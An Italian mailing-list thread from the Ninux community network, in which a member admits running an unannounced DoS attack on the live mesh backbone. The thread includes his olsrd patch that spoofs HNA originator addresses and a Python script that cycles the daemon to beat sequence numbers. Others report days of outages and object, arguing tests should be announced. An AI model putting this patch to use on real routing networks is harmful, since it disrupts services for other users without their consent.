[Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia
Daniela Ruggeri
ruggeridany a yahoo.it
Dom 25 Maggio 2014 08:14:23 UTC
se lo scopo è testare la rete per renderla inattaccabile, non c'e' bisogno di farlo all'improvviso e di nascosto.
Basta riservare un giorno avvisando in anticipo che in tale ora verranno fatti dei test di attacco senza rivelare subito il tipo di attacco, per vedere cosa succede e in caso decidere tutti insieme su come effettuare il rimedio
E' ingiusto attaccare, creare il panico e aspettare che gli altri trovino il rimedio
Ciao :-)
Daniela
Key GPG ID: AA2DA887
----
Un guerriero accetta la sua parte, qualunque possa essere, e l'accetta in assoluta umilta'. Accetta in umilta' cio' che egli e', e non ne fa motivo di rimpianto ma di sfida. Io conosco soltanto l’umilta' del guerriero, e questa non mi permettera' mai di schiavizzare qualcuno.
Carlos Castaneda.
Il Domenica 25 Maggio 2014 9:37, Andrea Pescetelli <andrea.pescetelli at gmail.com> ha scritto:
Ciao
Vorrei chiedere di prendere provvedimenti seri a seguito di questi eventi e comportamenti che da una settimana stanno invalidando sia il rispetto reciproco sia il buon finzionamento della rete stessa da parte di Saverio Proto.
Il 25/mag/2014 09:07 "Alessandro Gnagni" <alessandro at gnagni.it> ha scritto:
Non è qualche ora. Va avanti da giovedì mattina.
>Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
>Jabber è stato ko da giovedì per sta cosa.
>Il 25/mag/2014 01:03 "Saverio Proto" <zioproto at gmail.com> ha scritto:
>
>Ciao,
>>
>>Metto in Cc: anche wireless at ml.ninux.org perché questa email contiene
>>informazioni tecniche interessanti.
>>
>>bravi, avete risolto il problema in fretta :) Ho volutamente provato
>>un attacco DoS sul backbone per capire che effetto poteva avere.
>>
>>ecco la patch di olsrd con cui generavo l'attacco DoS
>>
>>diff --git a/src/build_msg.c b/src/build_msg.c
>>index 109f955..e252981 100644
>>--- a/src/build_msg.c
>>+++ b/src/build_msg.c
>>@@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
>> m = (union olsr_message *)msg_buffer;
>>
>> /* Fill header */
>>- m->v4.originator = olsr_cnf->main_addr.v4.s_addr;
>>+ struct in_addr fakesource;
>>+ fakesource.s_addr = 0;
>>+ //inet_hton(2956867021,&fakesource);
>>+ inet_aton("172.16.40.40",&fakesource);
>>+ m->v4.originator = fakesource.s_addr;
>> m->v4.hopcnt = 0;
>> m->v4.ttl = MAX_TTL;
>> m->v4.olsr_msgtype = HNA_MESSAGE;
>>
>>
>>una domanda,
>>
>>se avessi patchato anche:
>>
>>m->v4.hopcnt = XXX
>>
>>mettendo numeri casuali..
>>
>>sarebbe stato altrettanto facile capire chi è che iniettava questi messaggi ?
>>
>>mi sto divertendo parecchio con questi attacchi DoS, sono molto
>>istruttivi. Per chi vuole giocare insieme a me a programmare in C
>>possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo
>>che vorrei provare è DrDoS su snmp).
>>
>>un problema di questo attacco sono cmq i sequence number. Per rendere
>>l'attacco efficace ho dovuto far andare la mia instanza patchata di
>>OLSR a singhiozzo:
>>
>>import os
>>import time
>>
>>while True:
>> os.system("olsrd")
>> print "started\n"
>> time.sleep(120)
>> os.system("killall olsrd")
>> print "killed\n"
>> time.sleep(300)
>>
>>in quanto avevo bisogno che i miei sequence number dovevano sempre
>>essere piu bassi di quelli del spoofato, altrimenti venivano scartati
>>come out of sequence.
>>
>>vi va di scrivere insieme un articoletto per il blog ? Io scrivo la
>>parte di come ti costruisce l'attacco e voi la parte di come avete
>>fatto ad identificare il nodo spoofato ?
>>
>>ho staccatto il nodo attaccante, il gioco è finito :)
>>
>>ah... vi prego nessun malumore per qualche oretta di disservizi, this
>>is Ninux. Si fanno queste cose perché ci si diverte insieme.
>>
>>ciao :)
>>
>>Saverio
>>
>>Il 24 maggio 2014 23:23, Andrea Pescetelli
>><andrea.pescetelli at gmail.com> ha scritto:
>>> Saverio,
>>> Abbiamo rilevato che dal nodo Gallia viene generato un messaggio olsr hna
>>> con originator 172.16.40.40, validity time 570, hna 176.62.53.192/28
>>> proveniente dal nodo in oggetto.
>>>
>>> Questo problema sta oscurando diversi servizi di ninux in farm appartenenti
>>> a quella subnet.
>>>
>>> Abbiamo triangolato la posizione basandoci sugli hop count dei cammini
>>> multipli.
>>> puoi verificare?
>>>
>>> Grazie
>>>
>>> Fish, Hispanico, Halino
>>> --
>>> Andrea Pescetelli aka Fish
>>> Skype: andrea5742
>>> Ninux int: 5001/5002
>>> Mobile: +39 3891156050
>>>
>>>
>>>
>>>
>>
>_______________________________________________
>Wireless mailing list
>Wireless at ml.ninux.org
>http://ml.ninux.org/mailman/listinfo/wireless
>
>
_______________________________________________
Wireless mailing list
Wireless at ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://ml.ninux.org/pipermail/wireless/attachments/20140525/328dfad7/attachment.htm>
Maggiori informazioni sulla lista
Wireless